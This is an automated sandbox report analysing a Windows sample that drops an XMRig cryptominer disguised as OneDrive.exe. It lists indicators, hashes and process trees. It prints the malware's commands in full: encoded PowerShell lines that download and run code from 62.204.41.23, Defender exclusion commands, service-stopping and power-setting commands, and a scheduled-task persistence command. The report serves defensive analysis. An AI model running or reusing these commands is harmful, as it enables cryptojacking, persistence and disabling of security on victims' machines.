Analysis
-
max time kernel
150s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
08/05/2023, 01:00
Static task
static1
Behavioral task
behavioral1
Sample
ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe
Resource
win10v2004-20230220-en
General
-
Target
ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe
-
Size
82KB
-
MD5
0e4e3cdacfbe29fdc3e189e52ee8228e
-
SHA1
59bdf38588f8fefefd49aa748dac4d025e9d0ec3
-
SHA256
ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84
-
SHA512
4356a79c3c15f6bdd5c9e465f99cf5b5ea90edcf9e6e84be79cd3e128b3565462af4ce3982077f9f0b11035a30c3caedeae2ca4a62bc74eb6dc319c2236d302a
-
SSDEEP
1536:Vdbe0uWRLLmR/epMMj1McUa33271MT1AosEeR9m+dIs:Tb/RLLmJMMMjK63E1MT1zr+dp
Malware Config
Extracted
http://62.204.41.23/o.png
Extracted
http://62.204.41.23/r.png
Extracted
http://62.204.41.23/file.png
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 1740 created 1264 1740 OneDrive.exe 7 PID 1740 created 1264 1740 OneDrive.exe 7 PID 1740 created 1264 1740 OneDrive.exe 7 PID 1740 created 1264 1740 OneDrive.exe 7 PID 1740 created 1264 1740 OneDrive.exe 7 PID 1740 created 1264 1740 OneDrive.exe 7 PID 1936 created 1264 1936 OneDrive.exe 7 PID 1936 created 1264 1936 OneDrive.exe 7 PID 1936 created 1264 1936 OneDrive.exe 7 PID 1936 created 1264 1936 OneDrive.exe 7 PID 1936 created 1264 1936 OneDrive.exe 7 PID 1936 created 1264 1936 OneDrive.exe 7 -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/memory/1936-205-0x000000013FA40000-0x00000001409B5000-memory.dmp xmrig behavioral1/memory/1936-210-0x000000013FA40000-0x00000001409B5000-memory.dmp xmrig -
Blocklisted process makes network request 5 IoCs
flow pid Process 5 2020 powershell.exe 6 1524 powershell.exe 7 2004 powershell.exe 10 2004 powershell.exe 11 2004 powershell.exe -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OneDrive.exe -
Executes dropped EXE 2 IoCs
pid Process 1740 OneDrive.exe 1936 OneDrive.exe -
Loads dropped DLL 2 IoCs
pid Process 2004 powershell.exe 708 taskeng.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1740 set thread context of 324 1740 OneDrive.exe 48 PID 1936 set thread context of 2008 1936 OneDrive.exe 69 PID 1936 set thread context of 1860 1936 OneDrive.exe 79 -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 988 sc.exe 1124 sc.exe 1076 sc.exe 1484 sc.exe 1468 sc.exe 528 sc.exe 1140 sc.exe 1548 sc.exe 1520 sc.exe 1788 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 860 schtasks.exe 1964 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2004 powershell.exe 1524 powershell.exe 836 powershell.exe 2020 powershell.exe 2004 powershell.exe 2004 powershell.exe 1740 OneDrive.exe 1740 OneDrive.exe 1400 powershell.exe 1740 OneDrive.exe 1740 OneDrive.exe 1740 OneDrive.exe 1740 OneDrive.exe 1740 OneDrive.exe 1740 OneDrive.exe 1740 OneDrive.exe 1740 OneDrive.exe 1772 powershell.exe 324 dialer.exe 324 dialer.exe 324 dialer.exe 324 dialer.exe 1740 OneDrive.exe 1740 OneDrive.exe 1936 OneDrive.exe 1936 OneDrive.exe 2024 powershell.exe 1936 OneDrive.exe 1936 OneDrive.exe 1936 OneDrive.exe 1936 OneDrive.exe 1936 OneDrive.exe 1936 OneDrive.exe 1936 OneDrive.exe 1936 OneDrive.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 1872 powershell.exe 1936 OneDrive.exe 1936 OneDrive.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe 2008 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2004 powershell.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeDebugPrivilege 836 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 1400 powershell.exe Token: SeShutdownPrivilege 1288 powercfg.exe Token: SeDebugPrivilege 1772 powershell.exe Token: SeShutdownPrivilege 584 powercfg.exe Token: SeDebugPrivilege 324 dialer.exe Token: SeShutdownPrivilege 640 powercfg.exe Token: SeShutdownPrivilege 1732 powercfg.exe Token: SeDebugPrivilege 2024 powershell.exe Token: SeShutdownPrivilege 528 powercfg.exe Token: SeDebugPrivilege 2008 dialer.exe Token: SeShutdownPrivilege 596 powercfg.exe Token: SeDebugPrivilege 1872 powershell.exe Token: SeShutdownPrivilege 360 powercfg.exe Token: SeShutdownPrivilege 560 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 852 svchost.exe Token: SeIncreaseQuotaPrivilege 852 svchost.exe Token: SeSecurityPrivilege 852 svchost.exe Token: SeTakeOwnershipPrivilege 852 svchost.exe Token: SeLoadDriverPrivilege 852 svchost.exe Token: SeSystemtimePrivilege 852 svchost.exe Token: SeBackupPrivilege 852 svchost.exe Token: SeRestorePrivilege 852 svchost.exe Token: SeShutdownPrivilege 852 svchost.exe Token: SeSystemEnvironmentPrivilege 852 svchost.exe Token: SeUndockPrivilege 852 svchost.exe Token: SeManageVolumePrivilege 852 svchost.exe Token: SeAssignPrimaryTokenPrivilege 852 svchost.exe Token: SeIncreaseQuotaPrivilege 852 svchost.exe Token: SeSecurityPrivilege 852 svchost.exe Token: SeTakeOwnershipPrivilege 852 svchost.exe Token: SeLoadDriverPrivilege 852 svchost.exe Token: SeSystemtimePrivilege 852 svchost.exe Token: SeBackupPrivilege 852 svchost.exe Token: SeRestorePrivilege 852 svchost.exe Token: SeShutdownPrivilege 852 svchost.exe Token: SeSystemEnvironmentPrivilege 852 svchost.exe Token: SeUndockPrivilege 852 svchost.exe Token: SeManageVolumePrivilege 852 svchost.exe Token: SeAssignPrimaryTokenPrivilege 852 svchost.exe Token: SeIncreaseQuotaPrivilege 852 svchost.exe Token: SeSecurityPrivilege 852 svchost.exe Token: SeTakeOwnershipPrivilege 852 svchost.exe Token: SeLoadDriverPrivilege 852 svchost.exe Token: SeSystemtimePrivilege 852 svchost.exe Token: SeBackupPrivilege 852 svchost.exe Token: SeRestorePrivilege 852 svchost.exe Token: SeShutdownPrivilege 852 svchost.exe Token: SeSystemEnvironmentPrivilege 852 svchost.exe Token: SeUndockPrivilege 852 svchost.exe Token: SeManageVolumePrivilege 852 svchost.exe Token: SeAssignPrimaryTokenPrivilege 852 svchost.exe Token: SeIncreaseQuotaPrivilege 852 svchost.exe Token: SeSecurityPrivilege 852 svchost.exe Token: SeTakeOwnershipPrivilege 852 svchost.exe Token: SeLoadDriverPrivilege 852 svchost.exe Token: SeSystemtimePrivilege 852 svchost.exe Token: SeBackupPrivilege 852 svchost.exe Token: SeRestorePrivilege 852 svchost.exe Token: SeShutdownPrivilege 852 svchost.exe Token: SeSystemEnvironmentPrivilege 852 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2016 wrote to memory of 836 2016 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe 28 PID 2016 wrote to memory of 836 2016 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe 28 PID 2016 wrote to memory of 836 2016 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe 28 PID 2016 wrote to memory of 2020 2016 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe 30 PID 2016 wrote to memory of 2020 2016 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe 30 PID 2016 wrote to memory of 2020 2016 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe 30 PID 2016 wrote to memory of 2004 2016 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe 35 PID 2016 wrote to memory of 2004 2016 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe 35 PID 2016 wrote to memory of 2004 2016 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe 35 PID 2016 wrote to memory of 1524 2016 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe 33 PID 2016 wrote to memory of 1524 2016 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe 33 PID 2016 wrote to memory of 1524 2016 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe 33 PID 2004 wrote to memory of 1740 2004 powershell.exe 36 PID 2004 wrote to memory of 1740 2004 powershell.exe 36 PID 2004 wrote to memory of 1740 2004 powershell.exe 36 PID 1484 wrote to memory of 1468 1484 cmd.exe 41 PID 1484 wrote to memory of 1468 1484 cmd.exe 41 PID 1484 wrote to memory of 1468 1484 cmd.exe 41 PID 1484 wrote to memory of 528 1484 cmd.exe 42 PID 1484 wrote to memory of 528 1484 cmd.exe 42 PID 1484 wrote to memory of 528 1484 cmd.exe 42 PID 1484 wrote to memory of 1140 1484 cmd.exe 43 PID 1484 wrote to memory of 1140 1484 cmd.exe 43 PID 1484 wrote to memory of 1140 1484 cmd.exe 43 PID 1484 wrote to memory of 1548 1484 cmd.exe 44 PID 1484 wrote to memory of 1548 1484 cmd.exe 44 PID 1484 wrote to memory of 1548 1484 cmd.exe 44 PID 1484 wrote to memory of 1788 1484 cmd.exe 45 PID 1484 wrote to memory of 1788 1484 cmd.exe 45 PID 1484 wrote to memory of 1788 1484 cmd.exe 45 PID 1740 wrote to memory of 324 1740 OneDrive.exe 48 PID 1292 wrote to memory of 1288 1292 cmd.exe 51 PID 1292 wrote to memory of 1288 1292 cmd.exe 51 PID 1292 wrote to memory of 1288 1292 cmd.exe 51 PID 1292 wrote to memory of 584 1292 cmd.exe 52 PID 1292 wrote to memory of 584 1292 cmd.exe 52 PID 1292 wrote to memory of 584 1292 cmd.exe 52 PID 1292 wrote to memory of 640 1292 cmd.exe 53 PID 1292 wrote to memory of 640 1292 cmd.exe 53 PID 1292 wrote to memory of 640 1292 cmd.exe 53 PID 324 wrote to memory of 420 324 dialer.exe 22 PID 1292 wrote to memory of 1732 1292 cmd.exe 54 PID 1292 wrote to memory of 1732 1292 cmd.exe 54 PID 1292 wrote to memory of 1732 1292 cmd.exe 54 PID 324 wrote to memory of 464 324 dialer.exe 21 PID 1772 wrote to memory of 860 1772 powershell.exe 55 PID 1772 wrote to memory of 860 1772 powershell.exe 55 PID 1772 wrote to memory of 860 1772 powershell.exe 55 PID 324 wrote to memory of 480 324 dialer.exe 20 PID 708 wrote to memory of 1936 708 taskeng.exe 59 PID 708 wrote to memory of 1936 708 taskeng.exe 59 PID 708 wrote to memory of 1936 708 taskeng.exe 59 PID 1968 wrote to memory of 988 1968 cmd.exe 64 PID 1968 wrote to memory of 988 1968 cmd.exe 64 PID 1968 wrote to memory of 988 1968 cmd.exe 64 PID 1968 wrote to memory of 1124 1968 cmd.exe 65 PID 1968 wrote to memory of 1124 1968 cmd.exe 65 PID 1968 wrote to memory of 1124 1968 cmd.exe 65 PID 1968 wrote to memory of 1076 1968 cmd.exe 66 PID 1968 wrote to memory of 1076 1968 cmd.exe 66 PID 1968 wrote to memory of 1076 1968 cmd.exe 66 PID 1968 wrote to memory of 1520 1968 cmd.exe 68 PID 1968 wrote to memory of 1520 1968 cmd.exe 68 PID 1968 wrote to memory of 1520 1968 cmd.exe 68 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵PID:1864
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe1⤵PID:768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation1⤵PID:1812
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1264
-
C:\Users\Admin\AppData\Local\Temp\ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe"C:\Users\Admin\AppData\Local\Temp\ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1740
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1468
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:528
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1140
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1548
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1788
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:584
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huakaggax#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'3⤵
- Creates scheduled task(s)
PID:860
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "OneDrive"2⤵PID:1528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:988
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1124
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1076
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1484
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1520
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:916
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:528
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:596
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:360
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huakaggax#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'3⤵
- Creates scheduled task(s)
PID:1964
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1860
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1200
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵PID:1132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork1⤵PID:1052
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService1⤵PID:276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService1⤵PID:980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs1⤵
- Suspicious use of AdjustPrivilegeToken
PID:852 -
C:\Windows\system32\taskeng.exetaskeng.exe {3A49BA47-C9D2-4A9B-9077-F57E566CA86A} S-1-5-21-2647223082-2067913677-935928954-1000:BPOQNXYB\Admin:Interactive:[1]2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1936
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted1⤵PID:812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch1⤵PID:604
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵PID:1536
-
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:488
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:480
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:464
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52418ff943c2450513bb49fe59a0daea0
SHA13a072caf85a9562cef4db90ebe42116ac290acf3
SHA256b7997385b0a2e50e1e5258240d04b6b7eba0ff3644b7f2d5fffcb2beeff3aede
SHA5123557518b08f6af82a9ba2b876125d1d6f79c0d3dce60e7b2328887ca430e6bca9bde580ef1f7a38dfc53e159bb1f09d6832101b0cb19586bea808f7717c87011
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52418ff943c2450513bb49fe59a0daea0
SHA13a072caf85a9562cef4db90ebe42116ac290acf3
SHA256b7997385b0a2e50e1e5258240d04b6b7eba0ff3644b7f2d5fffcb2beeff3aede
SHA5123557518b08f6af82a9ba2b876125d1d6f79c0d3dce60e7b2328887ca430e6bca9bde580ef1f7a38dfc53e159bb1f09d6832101b0cb19586bea808f7717c87011
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52418ff943c2450513bb49fe59a0daea0
SHA13a072caf85a9562cef4db90ebe42116ac290acf3
SHA256b7997385b0a2e50e1e5258240d04b6b7eba0ff3644b7f2d5fffcb2beeff3aede
SHA5123557518b08f6af82a9ba2b876125d1d6f79c0d3dce60e7b2328887ca430e6bca9bde580ef1f7a38dfc53e159bb1f09d6832101b0cb19586bea808f7717c87011
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52418ff943c2450513bb49fe59a0daea0
SHA13a072caf85a9562cef4db90ebe42116ac290acf3
SHA256b7997385b0a2e50e1e5258240d04b6b7eba0ff3644b7f2d5fffcb2beeff3aede
SHA5123557518b08f6af82a9ba2b876125d1d6f79c0d3dce60e7b2328887ca430e6bca9bde580ef1f7a38dfc53e159bb1f09d6832101b0cb19586bea808f7717c87011
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52418ff943c2450513bb49fe59a0daea0
SHA13a072caf85a9562cef4db90ebe42116ac290acf3
SHA256b7997385b0a2e50e1e5258240d04b6b7eba0ff3644b7f2d5fffcb2beeff3aede
